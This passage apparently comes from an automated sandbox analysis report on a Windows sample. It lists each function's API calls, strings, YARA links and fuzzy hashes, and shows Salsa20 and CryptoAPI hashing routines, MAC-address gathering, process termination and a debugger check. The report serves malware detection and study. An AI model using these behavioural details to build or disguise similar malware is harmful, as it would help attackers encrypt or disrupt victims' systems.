                                                                                                                                                                                                      • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004110CA
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00411100
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041110B
                                                                                                                                                                                                      • _sprintf.LIBCMT ref: 0041112E
                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                                                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                                                      • String ID: %.2X
                                                                                                                                                                                                      • API String ID: 2451520719-213608013
                                                                                                                                                                                                      • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                                                                                                                                      • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00411900, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00411915
                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 00411962
                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004119B8
                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                                                                                                                        • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                                                      • String ID: failed with error
                                                                                                                                                                                                      • API String ID: 4182478520-946485432
                                                                                                                                                                                                      • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                                                                                                                      • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040F730, Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                                                                                                                                        • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                                                                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0040F9EA
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0040FADA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 273148273-0
                                                                                                                                                                                                      • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                                                                                                                                      • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040E870, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                                                                                                                      • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E98E
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                      • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                                                      • String ID: %.2X
                                                                                                                                                                                                      • API String ID: 1084002244-213608013
                                                                                                                                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                      • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040EAA0, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                                                                                                                      • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040EBB4
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                                                                                                                      • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                                                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                                                      • String ID: %.2X
                                                                                                                                                                                                      • API String ID: 1637485200-213608013
                                                                                                                                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                      • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040E670, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040E67F
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040E68B
                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0040E69E
                                                                                                                                                                                                      • _free.LIBCMT ref: 0040E6A4
                                                                                                                                                                                                        • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                                                                                                                      • _free.LIBCMT ref: 0040E6C5
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040E6CD
                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                                                                                                                      • _sprintf.LIBCMT ref: 0040E720
                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0040E732
                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0040E73C
                                                                                                                                                                                                      • _free.LIBCMT ref: 0040E745
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                                                                                                                      • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                                                                                                                      • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                                                      • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                                                                      • API String ID: 3901070236-1604013687
                                                                                                                                                                                                      • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                                                                                                                                      • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00410160, Relevance: 26.2, APIs: 17, Instructions: 660COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                                                                                                                                        • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                                                                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00410427
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00410514
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 273148273-0
                                                                                                                                                                                                      • Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                                                                                                                                      • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00412440, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                      • String ID: cmd.exe
                                                                                                                                                                                                      • API String ID: 2696918072-723907552
                                                                                                                                                                                                      • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                                                                                                                      • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004382A2, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 004382B9
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 004382CA
                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoLocale_wcscmp
                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                      • API String ID: 1351282208-711371036
                                                                                                                                                                                                      • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                                                                      • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C070, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                                                                                                                      • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __wassert
                                                                                                                                                                                                      • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                                                      • API String ID: 3993402318-1975116136
                                                                                                                                                                                                      • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                      • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00424168, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0042419D
                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DebuggerPresent_memset
                                                                                                                                                                                                      • String ID: i;B
                                                                                                                                                                                                      • API String ID: 2328436684-472376889
                                                                                                                                                                                                      • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                                                                                                                      • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004329EC, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00424266,?,?,?,00000001), ref: 004329F1
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004329FA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
                                                                                                                                                                                                      • Instruction ID: d7915fe9b98f2e2675b1eb18c11ae3c40c3bb41b36f5f7d781b256b54fe46c91
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7B09271044208ABDA802B93EC59F883F28EB04A62F084022F60D444628F6254508E99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004387C8, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(004387B4,00000001,?,004376BC,0043775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004387F6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2099609381-0
